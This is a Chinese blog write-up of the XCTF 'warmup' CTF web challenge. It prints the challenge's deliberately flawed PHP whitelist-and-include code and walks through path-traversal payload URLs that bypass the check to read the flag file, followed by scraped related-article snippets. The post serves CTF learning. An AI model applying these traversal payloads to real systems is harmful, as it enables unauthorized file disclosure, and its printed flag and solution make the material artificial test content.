XCTF-攻防世界CTF平台-Web类——6、warmup(php中include函数遍历漏洞)

最新推荐文章于 2025-05-28 15:10:43 发布
最新推荐文章于 2025-05-28 15:10:43 发布
阅读量1.7k 收藏 8
点赞数 4
CC 4.0 BY-SA版权
分类专栏: # Bugku、XCTF-WEB类写题过程 文章标签: 前端 web安全 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Onlyone_1314/article/details/121345155
本文深入探讨了一个PHP文件包含漏洞的实例,通过分析源代码,展示了如何构造payload来访问隐藏文件。讲解了三种不同的文件路径处理情况,并给出了利用文件包含特性的payload示例,揭示了flag{25e7bce6005c4e0c983fb97297ac6e5a}

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目提示:you can’t see it? well,I guess i can.
打开题目地址:
在这里插入图片描述

标题栏是Document,只有一张图片,所以我们审计源代码:
在这里插入图片描述

有一个source.php打开:
在这里插入图片描述

有一段判断页面的代码,还有一个hint.php
在这里插入图片描述

提示flag在ffffllllaaaagggg中,应该是另一个文件中,直接访问ffffllllaaaagggg文件是不存在的:
在这里插入图片描述

所以我们继续看source.php中的代码:

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

介绍一下主要用到的函数和变量:
$_REQUEST :
用于收集HTML表单提交的数据,默认情况下包含$_GET、$_POST和$_COOKIE内容的关联数组,这是一个“超全局”或自动全局变量。这只是意味着它在整个脚本的所有范围内都可用。不需要做全局$variable;在函数或方法中访问它。

程序的主要逻辑是if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&&emmm::checkFile($_REQUEST['file'])这个判断中的三个条件,成立就会include $_REQUEST[‘file’]包含输入的文件代码,否则就输出那张滑稽图片。
第一个条件:检查一个变量是否为空,第二个条件:是否为字符串,其中主要是第三个条件checkFile函数的判断:

public static function checkFile(&$page){
//关联数组键值对
    $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
//第一种情况:$page变量传入的是source.php或hint.php页面
//$page变量是否被设置,是否是一个字符串
    if (! isset($page) || !is_string($page)) {
        echo "you can't see it";
        return false;
    }
		 //$page变量的值是否在$whitelist数组中:source.php或hint.php
    if (in_array($page, $whitelist)) {return true;}
//第二种情况:source.php或hint.php后面带?的参数
//mb_strpos:查找?在$page中首次出现的位置,mb_substr:截取?之前的字符串
    $_page = mb_substr($page,0,mb_strpos($page . '?', '?'));
//?之前的页面是否在$whitelist数组中
    if (in_array($_page, $whitelist)) {
       return true;
    }
//第三种情况:source.php或hint.php后面带?经过url编码的参数
//urldecode:解码URL字符串,
    $_page = urldecode($page);
//再截取?之前的字符串
    $_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));
//再判断?之前的页面是否在$whitelist数组中    
if (in_array($_page, $whitelist)) {return true;}
    echo "you can't see it";
    return false;
}

所以允许的payload就是:

http://111.200.241.244:56778/?file=source.php?+payload

或者

http://111.200.241.244:56778/source.php?file=hint.php?+payload

条件成立之后include $_REQUEST[‘file’]就会包含输入的文件代码,这里我们的payload还需要用到include函数的一个特性:
被包含文件先按参数给出的路径寻找,如果没有给出目录(只有文件名)时则按照include_path指定的目录寻找。如果在include_path下没找到该文件则include最后才在调用脚本文件所在的目录和当前工作目录下寻找。如果最后仍未找到文件则include结构会发出一条E_WARNING。
如果定义了路径——不管是绝对路径(在 Windows 下以盘符或者 \ 开头,在 Unix/Linux 下以 / 开头)还是当前目录的相对路径(以 . 或者 … 开头)——include_path 都会被完全忽略。例如一个文件以 …/ 开头,则解析器会在当前目录的父目录下寻找该文件。
在这里插入图片描述

所以我们可以通过include函数的这个特性,一层一层文件夹的去寻找ffffllllaaaagggg文件:
http://111.200.241.244:56778/source.php?file=hint.php?/…/ffffllllaaaagggg
在这里插入图片描述

http://111.200.241.244:56778/source.php?file=hint.php?/…/…/ffffllllaaaagggg
在这里插入图片描述

http://111.200.241.244:56778/source.php?file=hint.php?/…/…/…/ffffllllaaaagggg
在这里插入图片描述

http://111.200.241.244:56778/source.php?file=hint.php?/…/…/…/…/ffffllllaaaagggg
在这里插入图片描述

最终的flag就是在第四层:flag{25e7bce6005c4e0c983fb97297ac6e5a}
同样地,另一个payload也可以:
http://111.200.241.244:56778/source.php?file=source.php?/…/…/…/…/ffffllllaaaagggg

另外,首页也可以进行文件包含攻击:

http://111.200.241.244:56778/?file=hint.php?/../../../../ffffllllaaaagggg

在这里插入图片描述

http://111.200.241.244:56778/?file=source.php?/../../../../ffffllllaaaagggg

在这里插入图片描述

得到flag{25e7bce6005c4e0c983fb97297ac6e5a}

【网络安全 | CTF攻防世界 warmup 解题详析
等风来
05-25 5693
函数接受一个参数 $page,并对其进行三次预处理,分别进行 URL 解码、去掉查询字符串和转换成统一编码,然后依次与白名单中的文件名进行比较,如果匹配成功则返回 true;其次,在主程序中通过判断用户的请求参数 $_REQUEST[‘file’] 是否存在、是否是字符串型,以及调用 emmm::checkFile 函数的返回结果来决定是否包含相应文件并输出。这段 PHP 代码主要用于检测用户请求的文件是否在白名单之内,如果在则可以包含该文件并输出,否则直接输出一张图片。$_page 的值为。
【网络安全 | CTF攻防世界 Web_php_includephp伪协议|data伪协议|file伪协议】
热门推荐
等风来
05-22 1万+
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
XCTF 之warm up(代码审计分析)
sunleibaba的博客
01-20 772
XCTF warmup解题思路(详细讲解php代码部分): 废话不多说,进入正题: 点击创建好的环境之后,我们看到了这样一个画面: 网页是一张图片,有点懵,我们先按F12,看一下源代码: 嘿嘿,发现了一个source.php。进行查看发现一系列源代码: php源码解析: 为了便于讲解我们将代码放到notepad++上面: 第1行语句是php语言的固定开头。 第2行:对文件进行php语法高亮显示。 第3行:实例化一个叫emmm的。 第4行和第11行语句是定义的固定语法。 第5行:利用静态方法
CTF warmup
Stay hungry, stay foolish.
01-30 482
CTF Warmup caesar_pi_encryptor
XCTF-web-fileinclude
最新发布
qq_52273419的博客
05-28 488
resource=/var/www/html/flag指定了要读取的文件为服务器上“/var/www/html/”目录下名为“flag”的文件。被调用与执行,因此cookie变量中很适合写入读取flag.php的payload。read=convert.base64 - encode表示以Base64编码方式读取内容。在cookie中的内容language 会被传到变量。php://filter是PHP的输入/输出过滤器。我们将加密字符串解密,就得到了flag。
攻防世界ctf题目(warmup
kiwi的博客
11-19 1489
这道题目是确实简单的,但是困扰了我一天时间,然后才将其想明白。
[CTF题目总结-web篇]攻防世界-warmup
T2hunz1
01-10 7997
[CTF题目总结-web篇]攻防世界-warmup
warmup [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列14
重新启程
12-23 1951
题目地址:warmup 这是高手进阶区的第三题,我们先看下题目内容 这个题目没有附件,那就是要fuzz的题目了,我们先正常走一下程序看看 root@mypwn:/ctf/work/python/warmup# nc 111.198.29.45 32453 -Warm Up- WOW:0x40060d >AAA 这个题目的出发点就是要大家做fuzz,看下提示内容有个地址0x40060...
XCTF-攻防世界-密码学crypto-新手练习区-writeup
Ryannn_的博客
10-23 1万+
目录 0x00 base64 0x01 Caesar 0x02 Morse 0x03 Railfence 0x04 转轮机加密 0x05 easy_RSA 0x06 Normal_RSA 0x07 不仅仅是Morse 0x08 混合编码 0x09 easychallenge 0x0A easy_ECC 0x0B 幂数加密 0x00 base64 元宵节灯谜是一种古老的传...
CTF-攻防世界web新手入门篇
weixin_45923850的博客
04-14 1万+
CTF练习题目
XCTF-RE】新手练习区-Hello, CTF.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/gisa2b
XCTF 3rd-HITB CTF-2017 arrdeepee 复现
m0_46580995的博客
07-05 1530
题目说明 我们某一个box被pwn了。在检查过程中,我们发现了一个叫mimikatz的东西,我们以前没有安装过,所以我们清除了,并且重新安装了box。但是,我们忘记备份我们的flag文件了。幸运的是,我们有一个攻击者网络流量捕获。你可以帮我们恢复出flag文件吗? 得到的是一个pcap包 有大量的tcp和udp流 查看udp流有以下的关键字 “ TSSecKeySet1”和“ Microsoft Strong Cryptographic Provider” 保存下来进行分析 有一些证书和私钥尝试openss
web | CTF】BUUCTF [HCTF 2018]WarmUp
weixin_46301214的博客
03-03 618
访问一下hint.php文件就告诉我们,flag在 ffffllllaaaagggg 这个文件里。hint.php 是必填的,然后重点来了,想要访问成其他文件,只需要继续拼接?拦截大概意思就是,我们输入:ffffllllaaaagggg。ffffllllaaaagggg == 数组里两个文件名吗?然后你会发现,这TM是五层目录啊,而且本地是无法复现出来的。发现文件,打开访问一下看看,发现是代码审计。这里经验灵感是 四个字,所以是四层目录。
[CTF/网络安全] 攻防世界 warmup 解题详析
Hacker_LaoYi的博客
01-02 611
查看页面源代码,发现source.php这段 PHP 代码主要用于检测用户请求的文件是否在白名单之内,如果在则可以包含该文件并输出,否则直接输出一张图片。下面对代码进行详细分析:首先,在代码第3行定义了名为 emmm 的一个,其中包含了静态函数 checkFile。该函数接受一个参数 $page,并对其进行三次预处理,分别进行 URL 解码、去掉查询字符串和转换成统一编码,然后依次与白名单中的文件名进行比较,如果匹配成功则返回 true;否则输出一条错误信息,并返回 false。
buuctf web warmup详细题解
weixin_64160292的博客
03-31 3485
题目:warmup 题目来源:buuctf 分析过程: 1. 首先ctrl + u 查看源代码,我们发现有一个source.php文件 2. 我们打开source.php文件,是一段代码,这道题要我们代码审计。 3. 与source文件相似的hint.php文件我们也打开看一下,它说flag在ffffllllaaaagggg中。 正在上传… 4. 然后回来source.php看这段代码,通过上网查询关于php函数的用法。然后审计代码得出,...
CTF_WP-攻防世界web题解(1),网络安全面试资料集合
碧海朝天素
04-08 948
查看源码提示source.php并且还提到了一个hint.php,查看提示flag在这个里面先看前面的源码source.phprequest接收参数file,判断是否为空、是否是string、checkfile如果满足,则包含file否则打印滑稽所以应该是要把ffffllllaaaagggg文件包含进file,关键就是怎么绕过checkfile接下看重点看checkfile函数,白名单被写死,return true的情况只有三种file在白名单中在file末尾加了个?
buuctf web 习题解析(1)
2201_75456435的博客
05-24 206
buuctf前六道题解析
CTF基础知识、Web(信息泄露下的目录遍历PHPINFO以及备份文件下载)
weixin_65852459的博客
04-22 2800
一、CTF基础知识 文章目录一、CTF基础知识(一)、简介(二)、竞赛模式(三)、比赛形式(四)、题目型二、Web(一)、信息泄露1、目录遍历2、PHPINFO3、备份文件下载网页链接 http://t.csdn.cn/vfIfj(复制此链接去网页搜索即可查看备份文件下载具体内容)(1)、网站源码(需复制上面链接去网页搜索即可)(2)、bak文件(需复制上面链接去网页搜索即可)(3)、vim缓存(需复制上面链接去网页搜索即可)(4)、.Ds_store(需复制上面链接去网页搜索即可) (一)、简介 1、开
Buuctf Web题解
weixin_68029979的博客
04-24 2105
写在前面, 本人小白一枚,记录一下web做题过程,大部分为个人理解可能有些地方写的不够明确还请见谅。当然由于刚入手web题,所以有些题会没有思路,这时会参考其他大佬的题解过程。本文会一直更新,由于是第一次写博客,所以并不知道一篇能写多少,不管怎样会一直更新的。在题解中,可能并没有说清除为什么是这样,什么要这样,其实大部分我也不知道是为什么,但就是这样做,由上所说我是个小白。如果在文中,出现了只有题目没有题解的情况,是因为我还没有学习与之相关的知识,所以先跳过了,但总会写的。
XCTF-WEB进阶-fakebook
02-28
### XCTF WEB进阶 Fakebook 解题报告 #### 源码分析 Fakebook 似于社交网络平台,在此环境中存在多个功能模块,包括但不限于用户注册、登录以及个人信息管理等功能。通过查看源代码发现,该应用可能存在多种安全漏洞。 对于假想的 `fakebook` 平台而言,其核心逻辑通常围绕着用户的会话管理和数据交互展开。假设存在如下简化版 PHP 伪代码表示部分关键业务流程: ```php <?php class User { public $username; public $password; function login($input_username, $input_password){ // 存在一个潜在的安全隐患:未对输入做严格验证 if ($this->username === $input_username && md5($input_password) === $this->password){ $_SESSION['logged_in'] = true; return "Login successful"; } return "Invalid credentials"; } } ?> ``` 上述代码片段展示了用户认证过程中可能存在的安全隐患——使用弱哈希算法 MD5 对密码进行了处理[^1]。 #### 安全问题剖析 基于以上描述可以推测出几个主要攻击面: - **弱哈希函数**:MD5 已经被证明不再适合用于保护敏感信息,因为它容易受到碰撞攻击的影响。 - **缺乏输入过滤机制**:未能有效防止恶意字符进入系统内部,这可能导致 SQL 注入或其他型的注入攻击发生。 - **不恰当的错误消息返回**:当用户名或密码错误时给出的具体提示可能会帮助攻击者缩小猜测范围。 #### 利用技巧 针对这些弱点,参赛选手可以从以下几个方面入手尝试突破并解决问题: - 尝试暴力破解或者彩虹表查找已知 MD5 值对应的原始字符串; - 测试是否存在其他形式的数据注入风险点,比如 URL 参数、POST 请求体内的字段等位置; - 探索是否有任何地方暴露出过多调试信息给外部访问者利用; 成功完成挑战后一般可以获得 flag 或者进一步的操作权限作为奖励。 #### 复现过程 为了模拟真实的渗透测试场景,建议按照以下方式构建实验环境来进行练习: 1. 构建一个似的 Web 应用程序框架,确保其中包含了所有必要的组件和服务依赖关系; 2. 实施相应的防护措施来抵御常见的Web 攻击手段,如 XSS 和 CSRF 等; 3. 使用工具辅助自动化执行某些特定任务,例如 Hydra 可以用来实施字典攻击尝试登陆接口; 4. 记录每一步操作细节以便后续总结经验教训,并分享给社区成员共同学习进步。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值